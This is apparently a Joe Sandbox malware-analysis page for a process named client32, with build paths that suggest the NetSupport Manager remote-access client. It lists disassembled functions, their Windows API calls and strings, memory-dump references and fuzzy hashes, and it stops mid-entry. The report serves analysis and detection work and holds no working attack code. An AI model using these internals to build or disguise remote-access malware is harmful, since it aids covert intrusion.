Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: CriticalSection$DeleteEnterLeave
String ID: Refcount.cpp$p < ep
API String ID: 655268472-358336193
Opcode ID: 2f66c15ac9e9ba5c473c04488d37f5616ffc05c82f5f041c2cbbf935da41fcb0
Instruction ID: 229cfc3e1b4d2854f513ba6d993453def638aa9b37d1214c32fcabad85841911
Opcode Fuzzy Hash: 2f66c15ac9e9ba5c473c04488d37f5616ffc05c82f5f041c2cbbf935da41fcb0
Instruction Fuzzy Hash: B721C672A04205AFCB20AF98CD84B9A77F8FB55715F11095EF815A3A40F731A80587A1

Function 110AF190 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,?), ref: 110AF24F

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

m_hWnd, xrefs: 110AF23D
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110AF238
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110AF1BB, 110AF218
IsA(), xrefs: 110AF1C0, 110AF21D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessTextWindowwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2794799252-3129562787
Opcode ID: 2da599f0c3f2941dd33979318759614f42c18a09b34261b493e4f111dfc93822
Instruction ID: 30af45ef0dcef238f528407b1a4bc814dd764d345def6d437735f0addba69835
Opcode Fuzzy Hash: 2da599f0c3f2941dd33979318759614f42c18a09b34261b493e4f111dfc93822
Instruction Fuzzy Hash: 39113A7DB007126BD922DA55FC00F8FF399AF9966DF004468E90567784EB35BA10CAA3

Function 110C5700 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 110C5737

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

..\CTL32\NSMString.cpp, xrefs: 110C579A
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110C5721, 110C5753
*this==src, xrefs: 110C579F
IsA(), xrefs: 110C5726, 110C5758

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess__strdupwsprintf
String ID: *this==src$..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
API String ID: 3256405202-349135390
Opcode ID: 2a14307763a186a2184f2a9b36c6b57fa76400cd452d2220f044514b48d4cbb5
Instruction ID: 990c6adcda38b5987a728539be4123f148fa86f5ba4ad2cdd8a82a2db87de86a
Opcode Fuzzy Hash: 2a14307763a186a2184f2a9b36c6b57fa76400cd452d2220f044514b48d4cbb5
Instruction Fuzzy Hash: 431102BCF00A03ABC611DF19EC04F9AF3AAAF95A48700C0A5E96497711EB22B4048F91

Function 111032D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57threadwindowsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 111032E8

Part of subcall function 11102790: SetEvent.KERNEL32(00000000), ref: 111027B4

WaitForSingleObject.KERNEL32(00000248,000003E8), ref: 1110331C

Part of subcall function 11103100: EnterCriticalSection.KERNEL32(00000010,00000000,759223A0,1100BE4B), ref: 11103108
Part of subcall function 11103100: LeaveCriticalSection.KERNEL32(00000010), ref: 11103115

PostMessageA.USER32(?,00000501,00000000,00000000), ref: 11103344
PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 1110334B

Strings

Queue, xrefs: 111032D4

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
String ID: Queue
API String ID: 620033763-3191623783
Opcode ID: 5ed127e90d7aea9cc1c571c6faff837e9d0f0bb831e3de670e3d281e69687fa7
Instruction ID: d8bb1088ac88664d3c3efc55309011d502dc20e6f167e529d16559b1f6741692
Opcode Fuzzy Hash: 5ed127e90d7aea9cc1c571c6faff837e9d0f0bb831e3de670e3d281e69687fa7
Instruction Fuzzy Hash: B311A039A557219FDB119B64D8C4B0BF7A4AB4A75CF008939E9518B380DE70F800CBA1

Function 1102B9A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,1102BD3D,00000000,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102B9AC
InterlockedIncrement.KERNEL32(111D8FB4), ref: 1102B9E9
InterlockedDecrement.KERNEL32(111D8FB4), ref: 1102BA10

Strings

EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102B9CF
SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102B9F6, 1102BA1C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementIncrementVersion
String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
API String ID: 1284810544-229394064
Opcode ID: 6e9c56378be5438a16cca2903a0e26d0fec4e836e644845389a97c5a2500010f
Instruction ID: cbe0deaacd3cbd9e6b2fb5d3adbedf869bee0b601fe3131bc4fdcaf8b9ea3cbe
Opcode Fuzzy Hash: 6e9c56378be5438a16cca2903a0e26d0fec4e836e644845389a97c5a2500010f
Instruction Fuzzy Hash: FE01FE3BE519755BD7129DA56D04F99F798AB4166FFD140A0FE1D91100E520A4014BF1

Function 110B71D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00000000,NSMCobrMain,?), ref: 110B71E5
LoadIconA.USER32(00000000,000032FA), ref: 110B7209
LoadCursorA.USER32(00000000,000019C8), ref: 110B721D
RegisterClassA.USER32(?), ref: 110B7250

Strings

NSMCobrMain, xrefs: 110B71DA, 110B7249

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassLoad$CursorIconInfoRegister
String ID: NSMCobrMain
API String ID: 2883182437-2967143332
Opcode ID: 1454587d98dabe09f0e1e52a1eccee313279903a0eb30fd0b654e57c9fcb1f51
Instruction ID: a253c0c09f64e32af6d17fda3169afc3079e396ae35490942e04615450f6f666
Opcode Fuzzy Hash: 1454587d98dabe09f0e1e52a1eccee313279903a0eb30fd0b654e57c9fcb1f51
Instruction Fuzzy Hash: 6C015AB5D0522D9BCF00DFE8C8496EEBBBDFB08704F40496AF815B3280D77555408BA5

Function 110430C0 Relevance: 7.8, APIs: 5, Instructions: 258COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 110432A5
SysFreeString.OLEAUT32(?), ref: 11043345
SysFreeString.OLEAUT32(?), ref: 11043354
_memset.LIBCMT ref: 110433BF
SysFreeString.OLEAUT32(?), ref: 1104341A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeString$__wcsicoll_memset
String ID:
API String ID: 3719176846-0
Opcode ID: b59fc4aa0084b8af2c0cb7ab9d91f53fdc2d914e01a4c7aac3460fa52ae7c500
Instruction ID: a4194a8621443a07a5b91cd7e8cbaf5f1c01176b50590b941be4798e65b70277
Opcode Fuzzy Hash: b59fc4aa0084b8af2c0cb7ab9d91f53fdc2d914e01a4c7aac3460fa52ae7c500
Instruction Fuzzy Hash: A2A1F775E046299FCB61CF59CC84ADAB7B9AF89305F2085D9E50CAB310DB31AE85CF50

Function 11107040 Relevance: 7.7, APIs: 5, Instructions: 171COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 1110708D
DestroyCaret.USER32 ref: 11107102
CreateCaret.USER32(?,00000000,?,?), ref: 111071C2
SetCaretPos.USER32(?,?), ref: 1110722D
ShowCaret.USER32(?), ref: 1110723D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Caret$ClientCreateDestroyRectShow
String ID:
API String ID: 3292185885-0
Opcode ID: eec5a9e55dd84aaa02b758eb0de184b29d26ab499fca542160f29245d0eece66
Instruction ID: 7f8c4dcae8a1f5dcc1e133171a0418012556dc92a04c507beb10c8b842d59a54
Opcode Fuzzy Hash: eec5a9e55dd84aaa02b758eb0de184b29d26ab499fca542160f29245d0eece66
Instruction Fuzzy Hash: DF519171E00B058BC715CE78C9C57AAF7FAEB88314F25952DE5AAC7280D634F945CB50

Function 11063210 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,2F623E72,?,?,?,?,2F623E72,?,?,?,?,11170348,000000FF,?,110679FB,00000010), ref: 110632BA
LeaveCriticalSection.KERNEL32(?), ref: 11063380

Part of subcall function 111026C0: InterlockedDecrement.KERNEL32(?), ref: 111026C8

Strings

r>b/, xrefs: 1106322F, 1106340A, 110633B9
EnumConn error, idata=%x, xrefs: 110633F6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$DecrementEnterInterlockedLeave
String ID: EnumConn error, idata=%x$r>b/
API String ID: 1807080765-3204620133
Opcode ID: b291daf73dcf3259c5623327772e4583ca1f3e03a8b6071e432c2e041ef0e574
Instruction ID: aa17bf20ae77388aa0ec91c98647f03043a44d4666c3d031e6487ff34e196994
Opcode Fuzzy Hash: b291daf73dcf3259c5623327772e4583ca1f3e03a8b6071e432c2e041ef0e574
Instruction Fuzzy Hash: F551B075E087568FEB15CF55C580BAAF7F8FB45318F1086ADC85A8BB81CB31A805CB90

Function 6CC82CA1 Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CC82CFC
_memcpy_s.LIBCMT ref: 6CC82D6D
__read.LIBCMT ref: 6CC82DD0
__filbuf.LIBCMT ref: 6CC82DEC

Part of subcall function 6CC83E69: __getptd_noexit.LIBCMT ref: 6CC83E69

_memset.LIBCMT ref: 6CC82E2D

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 279c57ec16b4c6bf5d0656fb4462528d78ab48611a87bef9276be520bbf6e590
Instruction ID: 464fc14015c13547512446ecb1478db521ceb584ed14b9796e841437f787abe7
Opcode Fuzzy Hash: 279c57ec16b4c6bf5d0656fb4462528d78ab48611a87bef9276be520bbf6e590
Instruction Fuzzy Hash: 2251B971A03605EBDB108FA9C86C69F7F71BF4032DF20466AE82497AD4F7709955CB60

Function 110933C0 Relevance: 7.6, APIs: 5, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11093412
SHGetMalloc.SHELL32(?), ref: 11093421
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000C00,00000000,?,?,?), ref: 110934A9
CoTaskMemFree.OLE32(?), ref: 11093514
CoTaskMemFree.OLE32(?), ref: 11093529

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeTask$FileInfoMalloc_memset
String ID:
API String ID: 2885524667-0
Opcode ID: 89345285ef7d7bab315390cfc6260b6fce797b71e935e12d37aa82ac9be1b202
Instruction ID: 28a74fc2d3e6b814f31ef4bd2b52e05c0b9688f5ab77d3eb3e4ee6575e525884
Opcode Fuzzy Hash: 89345285ef7d7bab315390cfc6260b6fce797b71e935e12d37aa82ac9be1b202
Instruction Fuzzy Hash: 64414B76A082189FDB11CF64CC94BEFB7B9AF49304F5041D9E44D9B240DA71AE85DF90

Function 110AB090 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB09B
LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0BE
SetEvent.KERNEL32(?,?,?,?,11043F5C,?,00000001), ref: 110AB0DA
LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0E1
LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0F7

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 8c47059aaa007ad8633e5d8c3be54e8c278fd32cc50d61e0effaef4322f575e5
Instruction ID: e0d87326b4d86e53b28e3cee19c451b2299f4d0e942967006842b7f646d6e484
Opcode Fuzzy Hash: 8c47059aaa007ad8633e5d8c3be54e8c278fd32cc50d61e0effaef4322f575e5
Instruction Fuzzy Hash: 020167335006549FD321A6A9E484BDBFBE8FB6B365F04852AF09BC6500D7B5A045C7A1

Function 110B5150 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 306COMMON

Download Yara Rule

APIs

Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D

std::_Xinvalid_argument.LIBCPMT ref: 110B5479

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110B539E
vector<T> too long, xrefs: 110B5474
IsA(), xrefs: 110B53A3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_freestd::_
String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$vector<T> too long
API String ID: 3009493112-1764033307
Opcode ID: 1467557cae63413adfea8cf217ea5322af11f329c2c3a2257ad9f516cd4137f2
